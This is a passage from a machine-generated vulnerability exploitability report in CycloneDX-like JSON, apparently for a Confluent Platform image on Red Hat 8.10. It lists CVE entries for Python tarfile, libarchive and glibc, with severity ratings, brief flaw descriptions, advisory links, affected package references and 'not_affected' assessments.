      "published": "2026-05-20T10:16:28+00:00",
      "updated": "2026-07-24T10:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4360",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        281
      ],
      "description": "In the Tarfile.extract() function, the filter parameter is not passed properly when extracting hardlinks. An affected system that extracts content from untrusted tar files could end up writing files with an unexpected uid/gid despite the user passing filter='data' to the extract() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4360"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4360"
        },
        {
          "url": "https://github.com/python/cpython/commit/0367912be336348b30572f8029cec4a282782d92"
        },
        {
          "url": "https://github.com/python/cpython/commit/5e0ef3f1afe892e4f64eb83368db57ac4c40cba0"
        },
        {
          "url": "https://github.com/python/cpython/commit/7b57e8d51446297b8c7c482d224bc5f1938e4301"
        },
        {
          "url": "https://github.com/python/cpython/commit/7ccdbaba2c54250a70d7f25632152df7655a5e0a"
        },
        {
          "url": "https://github.com/python/cpython/commit/cf23b9153181062150d061468b6d24af33fe214f"
        },
        {
          "url": "https://github.com/python/cpython/commit/d2b2f5eacab4dd48446b63340613b05dcbbf0b44"
        },
        {
          "url": "https://github.com/python/cpython/commit/eee3ddf0ca10283cc7fea724aae9cd8665f8d15e"
        },
        {
          "url": "https://github.com/python/cpython/issues/151987"
        },
        {
          "url": "https://github.com/python/cpython/pull/151988"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/TWZW2PC2AZOV6FENIHFSRC63OM7MBGSB/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4360"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4360"
        }
      ],
      "published": "2026-06-30T15:16:57+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4426",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1335
      ],
      "description": "A flaw was found in libarchive. An Undefined Behavior vulnerability exists in the zisofs decompression logic, caused by improper validation of a field (`pz_log2_bs`) read from ISO9660 Rock Ridge extensions. A remote attacker can exploit this by supplying a specially crafted ISO file. This can lead to incorrect memory allocation and potential application crashes, resulting in a denial-of-service (DoS) condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4426"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449010"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2897"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4426"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8292-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4426"
        }
      ],
      "published": "2026-03-19T15:16:28+00:00",
      "updated": "2026-06-17T10:56:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4437",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4437"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19061"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20597"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4437"
        },
        {
          "url": "https://bugzilla.redhat.com/2449777"
        },
        {
          "url": "https://bugzilla.redhat.com/2449783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449777"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453117"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4046"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4437"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4438"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19061.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:20597"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4437.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-500006.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4437"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34014"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8611-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4437"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/03/23/2"
        }
      ],
      "published": "2026-03-20T20:16:49+00:00",
      "updated": "2026-07-14T13:18:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
